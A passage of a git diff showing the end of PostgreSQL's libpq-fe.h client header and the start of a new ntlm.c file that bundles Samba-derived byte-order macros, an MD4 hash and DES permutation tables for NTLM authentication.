*/ + PQTRANS_ACTIVE, /* command in progress */ + PQTRANS_INTRANS, /* idle, within transaction block */ + PQTRANS_INERROR, /* idle, within failed transaction */ + PQTRANS_UNKNOWN /* cannot determine status */ + } PGTransactionStatusType; + + typedef enum { + PQERRORS_TERSE, /* single-line error messages */ + PQERRORS_DEFAULT, /* recommended style */ + PQERRORS_VERBOSE /* all the facts, ma'am */ + } PGVerbosity; + +/* PGconn encapsulates a connection to the backend. + * The contents of this struct are not supposed to be known to applications. + */ + typedef struct pg_conn PGconn; + +/* PGresult encapsulates the result of a query (or more precisely, of a single + * SQL command --- a query string given to PQsendQuery can contain multiple + * commands and thus return multiple PGresult objects). + * The contents of this struct are not supposed to be known to applications. + */ + typedef struct pg_result PGresult; + +/* PGnotify represents the occurrence of a NOTIFY message. + * Ideally this would be an opaque typedef, but it's so simple that it's + * unlikely to change. + * NOTE: in Postgres 6.4 and later, the be_pid is the notifying backend's, + * whereas in earlier versions it was always your own backend's PID. + */ + typedef struct pgNotify { + char *relname; /* notification condition name */ + int be_pid; /* process ID of server process */ + char *extra; /* notification parameter */ + } PGnotify; + +/* Function types for notice-handling callbacks */ + typedef void (*PQnoticeReceiver) (void *arg, const PGresult * res); + typedef void (*PQnoticeProcessor) (void *arg, const char *message); + +/* Print options for PQprint() */ + typedef char pqbool; + + typedef struct _PQprintOpt { + pqbool header; /* print output field headings and row + * count */ + pqbool align; /* fill align the fields */ + pqbool standard; /* old brain dead format */ + pqbool html3; /* output html tables */ + pqbool expanded; /* expand tables */ + pqbool pager; /* use pager for output if needed */ + char *fieldSep; /* field separator */ + char *tableOpt; /* insert to HTML */ + char *caption; /* HTML
*/ + char **fieldName; /* null terminated array of repalcement + * field names */ + } PQprintOpt; + +/* ---------------- + * Structure for the conninfo parameter definitions returned by PQconndefaults + * + * All fields except "val" point at static strings which must not be altered. + * "val" is either NULL or a malloc'd current-value string. PQconninfoFree() + * will release both the val strings and the PQconninfoOption array itself. + * ---------------- + */ + typedef struct _PQconninfoOption { + char *keyword; /* The keyword of the option */ + char *envvar; /* Fallback environment variable name */ + char *compiled; /* Fallback compiled in default value */ + char *val; /* Option's current value, or NULL */ + char *label; /* Label for field in connect dialog */ + char *dispchar; /* Character to display for this field in + * a connect dialog. Values are: "" + * Display entered value as is "*" + * Password field - hide value "D" Debug + * option - don't show by default */ + int dispsize; /* Field size in characters for dialog */ + } PQconninfoOption; + +/* ---------------- + * PQArgBlock -- structure for PQfn() arguments + * ---------------- + */ + typedef struct { + int len; + int isint; + union { + int *ptr; /* can't use void (dec compiler barfs) */ + int integer; + } u; + } PQArgBlock; + +/* ---------------- + * Exported functions of libpq + * ---------------- + */ + +/* === in fe-connect.c === */ + +/* make a new client connection to the backend */ + +/* Asynchronous (non-blocking) */ + extern PGconn *PQconnectStart(const char *conninfo); + extern PostgresPollingStatusType PQconnectPoll(PGconn * conn); + +/* Synchronous (blocking) */ + extern PGconn *PQconnectdb(const char *conninfo); + extern PGconn *PQsetdbLogin(const char *pghost, const char *pgport, const char *pgoptions, const char *pgtty, const char *dbName, const char *login, const char *pwd); + +#define PQsetdb(M_PGHOST,M_PGPORT,M_PGOPT,M_PGTTY,M_DBNAME) \ + PQsetdbLogin(M_PGHOST, M_PGPORT, M_PGOPT, M_PGTTY, M_DBNAME, NULL, NULL) + +/* close the current connection and free the PGconn data structure */ + extern void PQfinish(PGconn * conn); + +/* get info about connection options known to PQconnectdb */ + extern PQconninfoOption *PQconndefaults(void); + +/* free the data structure returned by PQconndefaults() */ + extern void PQconninfoFree(PQconninfoOption * connOptions); + +/* + * close the current connection and restablish a new one with the same + * parameters + */ + +/* Asynchronous (non-blocking) */ + extern int PQresetStart(PGconn * conn); + extern PostgresPollingStatusType PQresetPoll(PGconn * conn); + +/* Synchronous (blocking) */ + extern void PQreset(PGconn * conn); + +/* issue a cancel request */ + extern int PQrequestCancel(PGconn * conn); + +/* Accessor functions for PGconn objects */ + extern char *PQdb(const PGconn * conn); + extern char *PQuser(const PGconn * conn); + extern char *PQpass(const PGconn * conn); + extern char *PQhost(const PGconn * conn); + extern char *PQport(const PGconn * conn); + extern char *PQtty(const PGconn * conn); + extern char *PQoptions(const PGconn * conn); + extern ConnStatusType PQstatus(const PGconn * conn); + extern PGTransactionStatusType PQtransactionStatus(const PGconn * conn); + extern const char *PQparameterStatus(const PGconn * conn, const char *paramName); + extern int PQprotocolVersion(const PGconn * conn); + extern char *PQerrorMessage(const PGconn * conn); + extern int PQsocket(const PGconn * conn); + extern int PQbackendPID(const PGconn * conn); + extern int PQclientEncoding(const PGconn * conn); + extern int PQsetClientEncoding(PGconn * conn, const char *encoding); + +#ifdef USE_SSL + +/* Get the SSL structure associated with a connection */ + extern SSL *PQgetssl(PGconn * conn); +#endif + +/* Set verbosity for PQerrorMessage and PQresultErrorMessage */ + extern PGVerbosity PQsetErrorVerbosity(PGconn * conn, PGVerbosity verbosity); + +/* Enable/disable tracing */ + extern void PQtrace(PGconn * conn, FILE * debug_port); + extern void PQuntrace(PGconn * conn); + +/* Override default notice handling routines */ + extern PQnoticeReceiver PQsetNoticeReceiver(PGconn * conn, PQnoticeReceiver proc, void *arg); + extern PQnoticeProcessor PQsetNoticeProcessor(PGconn * conn, PQnoticeProcessor proc, void *arg); + +/* === in fe-exec.c === */ + +/* Simple synchronous query */ + extern PGresult *PQexec(PGconn * conn, const char *query); + extern PGresult *PQexecParams(PGconn * conn, + const char *command, + int nParams, const Oid * paramTypes, const char *const *paramValues, const int *paramLengths, const int *paramFormats, int resultFormat); + extern PGresult *PQexecPrepared(PGconn * conn, + const char *stmtName, int nParams, const char *const *paramValues, const int *paramLengths, const int *paramFormats, int resultFormat); + +/* Interface for multiple-result or asynchronous queries */ + extern int PQsendQuery(PGconn * conn, const char *query); + extern int PQsendQueryParams(PGconn * conn, + const char *command, + int nParams, const Oid * paramTypes, const char *const *paramValues, const int *paramLengths, const int *paramFormats, int resultFormat); + extern int PQsendQueryPrepared(PGconn * conn, + const char *stmtName, int nParams, const char *const *paramValues, const int *paramLengths, const int *paramFormats, int resultFormat); + extern PGresult *PQgetResult(PGconn * conn); + +/* Routines for managing an asynchronous query */ + extern int PQisBusy(PGconn * conn); + extern int PQconsumeInput(PGconn * conn); + +/* LISTEN/NOTIFY support */ + extern PGnotify *PQnotifies(PGconn * conn); + +/* Routines for copy in/out */ + extern int PQputCopyData(PGconn * conn, const char *buffer, int nbytes); + extern int PQputCopyEnd(PGconn * conn, const char *errormsg); + extern int PQgetCopyData(PGconn * conn, char **buffer, int async); + +/* Deprecated routines for copy in/out */ + extern int PQgetline(PGconn * conn, char *string, int length); + extern int PQputline(PGconn * conn, const char *string); + extern int PQgetlineAsync(PGconn * conn, char *buffer, int bufsize); + extern int PQputnbytes(PGconn * conn, const char *buffer, int nbytes); + extern int PQendcopy(PGconn * conn); + +/* Set blocking/nonblocking connection to the backend */ + extern int PQsetnonblocking(PGconn * conn, int arg); + extern int PQisnonblocking(const PGconn * conn); + +/* Force the write buffer to be written (or at least try) */ + extern int PQflush(PGconn * conn); + +/* + * "Fast path" interface --- not really recommended for application + * use + */ + extern PGresult *PQfn(PGconn * conn, int fnid, int *result_buf, int *result_len, int result_is_int, const PQArgBlock * args, int nargs); + +/* Accessor functions for PGresult objects */ + extern ExecStatusType PQresultStatus(const PGresult * res); + extern char *PQresStatus(ExecStatusType status); + extern char *PQresultErrorMessage(const PGresult * res); + extern char *PQresultErrorField(const PGresult * res, int fieldcode); + extern int PQntuples(const PGresult * res); + extern int PQnfields(const PGresult * res); + extern int PQbinaryTuples(const PGresult * res); + extern char *PQfname(const PGresult * res, int field_num); + extern int PQfnumber(const PGresult * res, const char *field_name); + extern Oid PQftable(const PGresult * res, int field_num); + extern int PQftablecol(const PGresult * res, int field_num); + extern int PQfformat(const PGresult * res, int field_num); + extern Oid PQftype(const PGresult * res, int field_num); + extern int PQfsize(const PGresult * res, int field_num); + extern int PQfmod(const PGresult * res, int field_num); + extern char *PQcmdStatus(PGresult * res); + extern char *PQoidStatus(const PGresult * res); /* old and ugly */ + extern Oid PQoidValue(const PGresult * res); /* new and improved */ + extern char *PQcmdTuples(PGresult * res); + extern char *PQgetvalue(const PGresult * res, int tup_num, int field_num); + extern int PQgetlength(const PGresult * res, int tup_num, int field_num); + extern int PQgetisnull(const PGresult * res, int tup_num, int field_num); + +/* Delete a PGresult */ + extern void PQclear(PGresult * res); + +/* For freeing other alloc'd results, such as PGnotify structs */ + extern void PQfreemem(void *ptr); + +/* Exists for backward compatibility. bjm 2003-03-24 */ +#define PQfreeNotify(ptr) PQfreemem(ptr) + +/* + * Make an empty PGresult with given status (some apps find this + * useful). If conn is not NULL and status indicates an error, the + * conn's errorMessage is copied. + */ + extern PGresult *PQmakeEmptyPGresult(PGconn * conn, ExecStatusType status); + + +/* Quoting strings before inclusion in queries. */ + extern size_t PQescapeString(char *to, const char *from, size_t length); + extern unsigned char *PQescapeBytea(const unsigned char *bintext, size_t binlen, size_t * bytealen); + extern unsigned char *PQunescapeBytea(const unsigned char *strtext, size_t * retbuflen); + + + +/* === in fe-print.c === */ + + extern void + PQprint(FILE * fout, /* output stream */ + const PGresult * res, const PQprintOpt * ps); /* option structure */ + +/* + * really old printing routines + */ + extern void + PQdisplayTuples(const PGresult * res, FILE * fp, /* where to send the output */ + int fillAlign, /* pad the fields with spaces */ + const char *fieldSep, /* field separator */ + int printHeader, /* display headers? */ + int quiet); + + extern void + PQprintTuples(const PGresult * res, FILE * fout, /* output stream */ + int printAttName, /* print attribute names */ + int terseOutput, /* delimiter bars */ + int width); /* width of column, if 0, use variable + * width */ + + +/* === in fe-lobj.c === */ + +/* Large-object access routines */ + extern int lo_open(PGconn * conn, Oid lobjId, int mode); + extern int lo_close(PGconn * conn, int fd); + extern int lo_read(PGconn * conn, int fd, char *buf, size_t len); + extern int lo_write(PGconn * conn, int fd, char *buf, size_t len); + extern int lo_lseek(PGconn * conn, int fd, int offset, int whence); + extern Oid lo_creat(PGconn * conn, int mode); + extern int lo_tell(PGconn * conn, int fd); + extern int lo_unlink(PGconn * conn, Oid lobjId); + extern Oid lo_import(PGconn * conn, const char *filename); + extern int lo_export(PGconn * conn, Oid lobjId, const char *filename); + +/* === in fe-misc.c === */ + +/* Determine length of multibyte encoded char at *s */ + extern int PQmblen(const unsigned char *s, int encoding); + +/* Get encoding id from environment variable PGCLIENTENCODING */ + extern int PQenv2encoding(void); + +#ifdef __cplusplus +} +#endif +#endif /* LIBPQ_FE_H */ diff --git a/ntlm.c b/ntlm.c new file mode 100644 index 0000000..e854b38 --- /dev/null +++ b/ntlm.c @@ -0,0 +1,1445 @@ + +/* $Id$ + Single file NTLM system to create and parse authentication messages. + + http://www.reversing.org + ilo-- ilo@reversing.org + + I did copy&paste&modify several files to leave independent NTLM code + that compile in cygwin/linux environment. Most of the code was ripped + from Samba implementation so I left the Copying statement. Samba core + code was left unmodified from 1.9 version. + + Also libntlm was ripped but rewrote, due to fixed and useless interface. + Library oriented code was removed. (c) goes to: Simon Josefsson. + + Information about interface to this ntlm-system is in ntlm.h file. + + Unix SMB/Netbios implementation. + Version 1.9. + SMB parameters and setup + Copyright (C) Andrew Tridgell 1992-1998 + Modified by Jeremy Allison 1995. + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. + + */ + +#ifdef WIN32 +#else +#include +#endif +#include +#include +#include +#include +#include +#include "ntlm.h" + + +/* Byte order macros */ +#ifndef _BYTEORDER_H +#define _BYTEORDER_H + +/* + This file implements macros for machine independent short and + int manipulation + +Here is a description of this file that I emailed to the samba list once: + +> I am confused about the way that byteorder.h works in Samba. I have +> looked at it, and I would have thought that you might make a distinction +> between LE and BE machines, but you only seem to distinguish between 386 +> and all other architectures. +> +> Can you give me a clue? + +sure. + +The distinction between 386 and other architectures is only there as +an optimisation. You can take it out completely and it will make no +difference. The routines (macros) in byteorder.h are totally byteorder +independent. The 386 optimsation just takes advantage of the fact that +the x86 processors don't care about alignment, so we don't have to +align ints on int boundaries etc. If there are other processors out +there that aren't alignment sensitive then you could also define +CAREFUL_ALIGNMENT=0 on those processors as well. + +Ok, now to the macros themselves. I'll take a simple example, say we +want to extract a 2 byte integer from a SMB packet and put it into a +type called uint16 that is in the local machines byte order, and you +want to do it with only the assumption that uint16 is _at_least_ 16 +bits long (this last condition is very important for architectures +that don't have any int types that are 2 bytes long) + +You do this: + +#define CVAL(buf,pos) (((unsigned char *)(buf))[pos]) +#define PVAL(buf,pos) ((unsigned)CVAL(buf,pos)) +#define SVAL(buf,pos) (PVAL(buf,pos)|PVAL(buf,(pos)+1)<<8) + +then to extract a uint16 value at offset 25 in a buffer you do this: + +char *buffer = foo_bar(); +uint16 xx = SVAL(buffer,25); + +We are using the byteoder independence of the ANSI C bitshifts to do +the work. A good optimising compiler should turn this into efficient +code, especially if it happens to have the right byteorder :-) + +I know these macros can be made a bit tidier by removing some of the +casts, but you need to look at byteorder.h as a whole to see the +reasoning behind them. byteorder.h defines the following macros: + +SVAL(buf,pos) - extract a 2 byte SMB value +IVAL(buf,pos) - extract a 4 byte SMB value +SVALS(buf,pos) signed version of SVAL() +IVALS(buf,pos) signed version of IVAL() + +SSVAL(buf,pos,val) - put a 2 byte SMB value into a buffer +SIVAL(buf,pos,val) - put a 4 byte SMB value into a buffer +SSVALS(buf,pos,val) - signed version of SSVAL() +SIVALS(buf,pos,val) - signed version of SIVAL() + +RSVAL(buf,pos) - like SVAL() but for NMB byte ordering +RSVALS(buf,pos) - like SVALS() but for NMB byte ordering +RIVAL(buf,pos) - like IVAL() but for NMB byte ordering +RIVALS(buf,pos) - like IVALS() but for NMB byte ordering +RSSVAL(buf,pos,val) - like SSVAL() but for NMB ordering +RSIVAL(buf,pos,val) - like SIVAL() but for NMB ordering +RSIVALS(buf,pos,val) - like SIVALS() but for NMB ordering + +it also defines lots of intermediate macros, just ignore those :-) + +*/ + +/* some switch macros that do both store and read to and from SMB buffers */ + +#define RW_PCVAL(read,inbuf,outbuf,len) \ + { if (read) { PCVAL (inbuf,0,outbuf,len); } \ + else { PSCVAL(inbuf,0,outbuf,len); } } + +#define RW_PIVAL(read,big_endian,inbuf,outbuf,len) \ + { if (read) { if (big_endian) { RPIVAL(inbuf,0,outbuf,len); } else { PIVAL(inbuf,0,outbuf,len); } } \ + else { if (big_endian) { RPSIVAL(inbuf,0,outbuf,len); } else { PSIVAL(inbuf,0,outbuf,len); } } } + +#define RW_PSVAL(read,big_endian,inbuf,outbuf,len) \ + { if (read) { if (big_endian) { RPSVAL(inbuf,0,outbuf,len); } else { PSVAL(inbuf,0,outbuf,len); } } \ + else { if (big_endian) { RPSSVAL(inbuf,0,outbuf,len); } else { PSSVAL(inbuf,0,outbuf,len); } } } + +#define RW_CVAL(read, inbuf, outbuf, offset) \ + { if (read) { (outbuf) = CVAL (inbuf,offset); } \ + else { SCVAL(inbuf,offset,outbuf); } } + +#define RW_IVAL(read, big_endian, inbuf, outbuf, offset) \ + { if (read) { (outbuf) = ((big_endian) ? RIVAL(inbuf,offset) : IVAL (inbuf,offset)); } \ + else { if (big_endian) { RSIVAL(inbuf,offset,outbuf); } else { SIVAL(inbuf,offset,outbuf); } } } + +#define RW_SVAL(read, big_endian, inbuf, outbuf, offset) \ + { if (read) { (outbuf) = ((big_endian) ? RSVAL(inbuf,offset) : SVAL (inbuf,offset)); } \ + else { if (big_endian) { RSSVAL(inbuf,offset,outbuf); } else { SSVAL(inbuf,offset,outbuf); } } } + +#undef CAREFUL_ALIGNMENT + +/* we know that the 386 can handle misalignment and has the "right" + byteorder */ +#ifdef __i386__ +#define CAREFUL_ALIGNMENT 0 +#endif + +#ifndef CAREFUL_ALIGNMENT +#define CAREFUL_ALIGNMENT 1 +#endif + +#define CVAL(buf,pos) (((unsigned char *)(buf))[pos]) +#define PVAL(buf,pos) ((unsigned)CVAL(buf,pos)) +#define SCVAL(buf,pos,val) (CVAL(buf,pos) = (val)) + + +#if CAREFUL_ALIGNMENT + +#define SVAL(buf,pos) (PVAL(buf,pos)|PVAL(buf,(pos)+1)<<8) +#define IVAL(buf,pos) (SVAL(buf,pos)|SVAL(buf,(pos)+2)<<16) +#define SSVALX(buf,pos,val) (CVAL(buf,pos)=(val)&0xFF,CVAL(buf,pos+1)=(val)>>8) +#define SIVALX(buf,pos,val) (SSVALX(buf,pos,val&0xFFFF),SSVALX(buf,pos+2,val>>16)) +#define SVALS(buf,pos) ((int16)SVAL(buf,pos)) +#define IVALS(buf,pos) ((int32)IVAL(buf,pos)) +#define SSVAL(buf,pos,val) SSVALX((buf),(pos),((uint16)(val))) +#define SIVAL(buf,pos,val) SIVALX((buf),(pos),((uint32)(val))) +#define SSVALS(buf,pos,val) SSVALX((buf),(pos),((int16)(val))) +#define SIVALS(buf,pos,val) SIVALX((buf),(pos),((int32)(val))) + +#else /* CAREFUL_ALIGNMENT */ + +/* this handles things for architectures like the 386 that can handle + alignment errors */ + +/* + WARNING: This section is dependent on the length of int16 and int32 + being correct +*/ + +/* get single value from an SMB buffer */ +#define SVAL(buf,pos) (*(uint16 *)((char *)(buf) + (pos))) +#define IVAL(buf,pos) (*(uint32 *)((char *)(buf) + (pos))) +#define SVALS(buf,pos) (*(int16 *)((char *)(buf) + (pos))) +#define IVALS(buf,pos) (*(int32 *)((char *)(buf) + (pos))) + +/* store single value in an SMB buffer */ +#define SSVAL(buf,pos,val) SVAL(buf,pos)=((uint16)(val)) +#define SIVAL(buf,pos,val) IVAL(buf,pos)=((uint32)(val)) +#define SSVALS(buf,pos,val) SVALS(buf,pos)=((int16)(val)) +#define SIVALS(buf,pos,val) IVALS(buf,pos)=((int32)(val)) + +#endif /* CAREFUL_ALIGNMENT */ + +/* macros for reading / writing arrays */ + +#define SMBMACRO(macro,buf,pos,val,len,size) \ +{ int l; for (l = 0; l < (len); l++) (val)[l] = macro((buf), (pos) + (size)*l); } + +#define SSMBMACRO(macro,buf,pos,val,len,size) \ +{ int l; for (l = 0; l < (len); l++) macro((buf), (pos) + (size)*l, (val)[l]); } + +/* reads multiple data from an SMB buffer */ +#define PCVAL(buf,pos,val,len) SMBMACRO(CVAL,buf,pos,val,len,1) +#define PSVAL(buf,pos,val,len) SMBMACRO(SVAL,buf,pos,val,len,2) +#define PIVAL(buf,pos,val,len) SMBMACRO(IVAL,buf,pos,val,len,4) +#define PCVALS(buf,pos,val,len) SMBMACRO(CVALS,buf,pos,val,len,1) +#define PSVALS(buf,pos,val,len) SMBMACRO(SVALS,buf,pos,val,len,2) +#define PIVALS(buf,pos,val,len) SMBMACRO(IVALS,buf,pos,val,len,4) + +/* stores multiple data in an SMB buffer */ +#define PSCVAL(buf,pos,val,len) SSMBMACRO(SCVAL,buf,pos,val,len,1) +#define PSSVAL(buf,pos,val,len) SSMBMACRO(SSVAL,buf,pos,val,len,2) +#define PSIVAL(buf,pos,val,len) SSMBMACRO(SIVAL,buf,pos,val,len,4) +#define PSCVALS(buf,pos,val,len) SSMBMACRO(SCVALS,buf,pos,val,len,1) +#define PSSVALS(buf,pos,val,len) SSMBMACRO(SSVALS,buf,pos,val,len,2) +#define PSIVALS(buf,pos,val,len) SSMBMACRO(SIVALS,buf,pos,val,len,4) + + +/* now the reverse routines - these are used in nmb packets (mostly) */ +#define SREV(x) ((((x)&0xFF)<<8) | (((x)>>8)&0xFF)) +#define IREV(x) ((SREV(x)<<16) | (SREV((x)>>16))) + +#define RSVAL(buf,pos) SREV(SVAL(buf,pos)) +#define RSVALS(buf,pos) SREV(SVALS(buf,pos)) +#define RIVAL(buf,pos) IREV(IVAL(buf,pos)) +#define RIVALS(buf,pos) IREV(IVALS(buf,pos)) +#define RSSVAL(buf,pos,val) SSVAL(buf,pos,SREV(val)) +#define RSSVALS(buf,pos,val) SSVALS(buf,pos,SREV(val)) +#define RSIVAL(buf,pos,val) SIVAL(buf,pos,IREV(val)) +#define RSIVALS(buf,pos,val) SIVALS(buf,pos,IREV(val)) + +/* reads multiple data from an SMB buffer (big-endian) */ +#define RPSVAL(buf,pos,val,len) SMBMACRO(RSVAL,buf,pos,val,len,2) +#define RPIVAL(buf,pos,val,len) SMBMACRO(RIVAL,buf,pos,val,len,4) +#define RPSVALS(buf,pos,val,len) SMBMACRO(RSVALS,buf,pos,val,len,2) +#define RPIVALS(buf,pos,val,len) SMBMACRO(RIVALS,buf,pos,val,len,4) + +/* stores multiple data in an SMB buffer (big-endian) */ +#define RPSSVAL(buf,pos,val,len) SSMBMACRO(RSSVAL,buf,pos,val,len,2) +#define RPSIVAL(buf,pos,val,len) SSMBMACRO(RSIVAL,buf,pos,val,len,4) +#define RPSSVALS(buf,pos,val,len) SSMBMACRO(RSSVALS,buf,pos,val,len,2) +#define RPSIVALS(buf,pos,val,len) SSMBMACRO(RSIVALS,buf,pos,val,len,4) + +#define DBG_RW_PCVAL(charmode,string,depth,base,read,inbuf,outbuf,len) \ + { RW_PCVAL(read,inbuf,outbuf,len) \ + DEBUG(5,("%s%04x %s: ", \ + tab_depth(depth), base,string)); \ + if (charmode) print_asc(5, (unsigned char*)(outbuf), (len)); else \ + { int idx; for (idx = 0; idx < len; idx++) { DEBUG(5,("%02x ", (outbuf)[idx])); } } \ + DEBUG(5,("\n")); } + +#define DBG_RW_PSVAL(charmode,string,depth,base,read,big_endian,inbuf,outbuf,len) \ + { RW_PSVAL(read,big_endian,inbuf,outbuf,len) \ + DEBUG(5,("%s%04x %s: ", \ + tab_depth(depth), base,string)); \ + if (charmode) print_asc(5, (unsigned char*)(outbuf), 2*(len)); else \ + { int idx; for (idx = 0; idx < len; idx++) { DEBUG(5,("%04x ", (outbuf)[idx])); } } \ + DEBUG(5,("\n")); } + +#define DBG_RW_PIVAL(charmode,string,depth,base,read,big_endian,inbuf,outbuf,len) \ + { RW_PIVAL(read,big_endian,inbuf,outbuf,len) \ + DEBUG(5,("%s%04x %s: ", \ + tab_depth(depth), base,string)); \ + if (charmode) print_asc(5, (unsigned char*)(outbuf), 4*(len)); else \ + { int idx; for (idx = 0; idx < len; idx++) { DEBUG(5,("%08x ", (outbuf)[idx])); } } \ + DEBUG(5,("\n")); } + +#define DBG_RW_CVAL(string,depth,base,read,inbuf,outbuf) \ + { RW_CVAL(read,inbuf,outbuf,0) \ + DEBUG(5,("%s%04x %s: %02x\n", \ + tab_depth(depth), base, string, outbuf)); } + +#define DBG_RW_SVAL(string,depth,base,read,big_endian,inbuf,outbuf) \ + { RW_SVAL(read,big_endian,inbuf,outbuf,0) \ + DEBUG(5,("%s%04x %s: %04x\n", \ + tab_depth(depth), base, string, outbuf)); } + +#define DBG_RW_IVAL(string,depth,base,read,big_endian,inbuf,outbuf) \ + { RW_IVAL(read,big_endian,inbuf,outbuf,0) \ + DEBUG(5,("%s%04x %s: %08x\n", \ + tab_depth(depth), base, string, outbuf)); } + +#endif /* _BYTEORDER_H */ + + +/* Samba MD4 implementation */ + +/* NOTE: This code makes no attempt to be fast! + + It assumes that a int is at least 32 bits long +*/ + +static uint32 A, B, C, D; + +static uint32 F(uint32 X, uint32 Y, uint32 Z) { + return (X & Y) | ((~X) & Z); +} + +static uint32 G(uint32 X, uint32 Y, uint32 Z) { + return (X & Y) | (X & Z) | (Y & Z); +} + +static uint32 H(uint32 X, uint32 Y, uint32 Z) { + return X ^ Y ^ Z; +} + +static uint32 lshift(uint32 x, int s) { + x &= 0xFFFFFFFF; + return ((x << s) & 0xFFFFFFFF) | (x >> (32 - s)); +} + +#define ROUND1(a,b,c,d,k,s) a = lshift(a + F(b,c,d) + X[k], s) +#define ROUND2(a,b,c,d,k,s) a = lshift(a + G(b,c,d) + X[k] + (uint32)0x5A827999,s) +#define ROUND3(a,b,c,d,k,s) a = lshift(a + H(b,c,d) + X[k] + (uint32)0x6ED9EBA1,s) + +/* this applies md4 to 64 byte chunks */ +static void mdfour64(uint32 * M) { + int j; + uint32 AA, BB, CC, DD; + uint32 X[16]; + + for (j = 0; j < 16; j++) + X[j] = M[j]; + + AA = A; + BB = B; + CC = C; + DD = D; + + ROUND1(A, B, C, D, 0, 3); + ROUND1(D, A, B, C, 1, 7); + ROUND1(C, D, A, B, 2, 11); + ROUND1(B, C, D, A, 3, 19); + ROUND1(A, B, C, D, 4, 3); + ROUND1(D, A, B, C, 5, 7); + ROUND1(C, D, A, B, 6, 11); + ROUND1(B, C, D, A, 7, 19); + ROUND1(A, B, C, D, 8, 3); + ROUND1(D, A, B, C, 9, 7); + ROUND1(C, D, A, B, 10, 11); + ROUND1(B, C, D, A, 11, 19); + ROUND1(A, B, C, D, 12, 3); + ROUND1(D, A, B, C, 13, 7); + ROUND1(C, D, A, B, 14, 11); + ROUND1(B, C, D, A, 15, 19); + + ROUND2(A, B, C, D, 0, 3); + ROUND2(D, A, B, C, 4, 5); + ROUND2(C, D, A, B, 8, 9); + ROUND2(B, C, D, A, 12, 13); + ROUND2(A, B, C, D, 1, 3); + ROUND2(D, A, B, C, 5, 5); + ROUND2(C, D, A, B, 9, 9); + ROUND2(B, C, D, A, 13, 13); + ROUND2(A, B, C, D, 2, 3); + ROUND2(D, A, B, C, 6, 5); + ROUND2(C, D, A, B, 10, 9); + ROUND2(B, C, D, A, 14, 13); + ROUND2(A, B, C, D, 3, 3); + ROUND2(D, A, B, C, 7, 5); + ROUND2(C, D, A, B, 11, 9); + ROUND2(B, C, D, A, 15, 13); + + ROUND3(A, B, C, D, 0, 3); + ROUND3(D, A, B, C, 8, 9); + ROUND3(C, D, A, B, 4, 11); + ROUND3(B, C, D, A, 12, 15); + ROUND3(A, B, C, D, 2, 3); + ROUND3(D, A, B, C, 10, 9); + ROUND3(C, D, A, B, 6, 11); + ROUND3(B, C, D, A, 14, 15); + ROUND3(A, B, C, D, 1, 3); + ROUND3(D, A, B, C, 9, 9); + ROUND3(C, D, A, B, 5, 11); + ROUND3(B, C, D, A, 13, 15); + ROUND3(A, B, C, D, 3, 3); + ROUND3(D, A, B, C, 11, 9); + ROUND3(C, D, A, B, 7, 11); + ROUND3(B, C, D, A, 15, 15); + + A += AA; + B += BB; + C += CC; + D += DD; + + A &= 0xFFFFFFFF; + B &= 0xFFFFFFFF; + C &= 0xFFFFFFFF; + D &= 0xFFFFFFFF; + + for (j = 0; j < 16; j++) + X[j] = 0; +} + +static void copy64(uint32 * M, unsigned char *in) { + int i; + + for (i = 0; i < 16; i++) + M[i] = (in[i * 4 + 3] << 24) | (in[i * 4 + 2] << 16) | (in[i * 4 + 1] << 8) | (in[i * 4 + 0] << 0); +} + +static void copy4(unsigned char *out, uint32 x) { + out[0] = x & 0xFF; + out[1] = (x >> 8) & 0xFF; + out[2] = (x >> 16) & 0xFF; + out[3] = (x >> 24) & 0xFF; +} + +/* produce a md4 message digest from data of length n bytes */ +void mdfour(unsigned char *out, unsigned char *in, int n) { + unsigned char buf[128]; + uint32 M[16]; + uint32 b = n * 8; + int i; + + A = 0x67452301; + B = 0xefcdab89; + C = 0x98badcfe; + D = 0x10325476; + + while (n > 64) { + copy64(M, in); + mdfour64(M); + in += 64; + n -= 64; + } + + for (i = 0; i < 128; i++) + buf[i] = 0; + memcpy(buf, in, n); + buf[n] = 0x80; + + if (n <= 55) { + copy4(buf + 56, b); + copy64(M, buf); + mdfour64(M); + } else { + copy4(buf + 120, b); + copy64(M, buf); + mdfour64(M); + copy64(M, buf + 64); + mdfour64(M); + } + + for (i = 0; i < 128; i++) + buf[i] = 0; + copy64(M, buf); + + copy4(out, A); + copy4(out + 4, B); + copy4(out + 8, C); + copy4(out + 12, D); + + A = B = C = D = 0; +} + +/* Samba DES implementation */ +#define uchar unsigned char +#define int16 signed short + +static uchar perm1[56] = { 57, 49, 41, 33, 25, 17, 9, + 1, 58, 50, 42, 34, 26, 18, + 10, 2, 59, 51, 43, 35, 27, + 19, 11, 3, 60, 52, 44, 36, + 63, 55, 47, 39, 31, 23, 15, + 7, 62, 54, 46, 38, 30, 22, + 14, 6, 61, 53, 45, 37, 29, + 21, 13, 5, 28, 20, 12, 4 +}; + +static uchar perm2[48] = { 14, 17, 11, 24, 1, 5, + 3, 28, 15, 6, 21, 10, + 23, 19, 12, 4, 26, 8, + 16, 7, 27, 20, 13, 2, + 41, 52, 31, 37, 47, 55, + 30, 40, 51, 45, 33, 48, + 44, 49, 39, 56, 34, 53, + 46, 42, 50, 36, 29, 32 +}; + +static uchar perm3[64] = { 58, 50, 42, 34, 26, 18, 10, 2, + 60, 52, 44, 36, 28, 20, 12, 4, + 62, 54, 46, 38, 30, 22, 14, 6, + 64, 56, 48, 40, 32, 24, 16, 8, + 57, 49, 41, 33, 25, 17, 9, 1, + 59, 51, 43, 35, 27, 19, 11, 3, + 61, 53, 45, 37, 29, 21, 13, 5, + 63, 55, 47, 39, 31, 23, 15, 7 +}; + +static uchar perm4[48] = { 32, 1, 2, 3, 4, 5, + 4, 5, 6, 7, 8, 9, + 8, 9, 10, 11, 12, 13, + 12, 13, 14, 15, 16, 17, + 16, 17, 18, 19, 20, 21, + 20, 21, 22, 23, 24, 25, + 24, 25, 26, 27, 28, 29, + 28, 29, 30, 31, 32, 1 +}; + +static uchar perm5[32] = { 16, 7, 20, 21, + 29, 12, 28, 17, + 1, 15, 23, 26, + 5, 18, 31, 10, + 2, 8, 24, 14, + 32, 27, 3, 9, + 19, 13, 30, 6, + 22, 11, 4, 25 